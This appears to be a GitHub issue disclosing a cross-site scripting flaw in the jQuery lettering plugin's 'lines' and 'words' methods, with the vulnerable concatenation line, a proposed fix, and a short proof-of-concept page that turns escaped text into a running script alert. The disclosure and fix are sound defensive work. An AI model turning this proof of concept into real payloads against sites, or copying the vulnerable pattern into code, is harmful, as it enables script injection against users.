Skip to content

Security issue: XSS for methods 'lines' and 'words' #88

@pcworld

Description

@pcworld

The injector first extracts the DOM text representation, then inserts it into HTML:

inject += '<span class="'+klass+(i+1)+'" aria-hidden="true">'+item+'</span>'+after;

Thus even when the server properly escapes user input, calling lettering on these DOM nodes converts it back to HTML, allowing for cross-site-scripting (XSS).
This is probably only exploitable in the "lines" and "words" methods, because the default method splits into characters, and the < in <span><</span> is parsed as text by browsers.

Solution

Create the <span> programmatically using document.createElement and set the content using textContent.

Exploit

<!doctype html>
<html>
<head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js"></script>
<script src="./jquery.lettering.js"></script>
</head>
<body>
<div id="exploitme">&lt;script&gt;alert(&quot;I'm properly escaped HTML&quot;);&lt;/script&gt;</div>
<script>
jQuery('#exploitme').lettering('lines');
</script>
</body>
</html>

A popup showing "I'm properly escaped HTML" will open, thus arbitrary code execution is achieved. Tested in Firefox 75.0 and Chromium 81.0.4044.113.

Metadata

Metadata

Assignees

No one assigned

    Labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions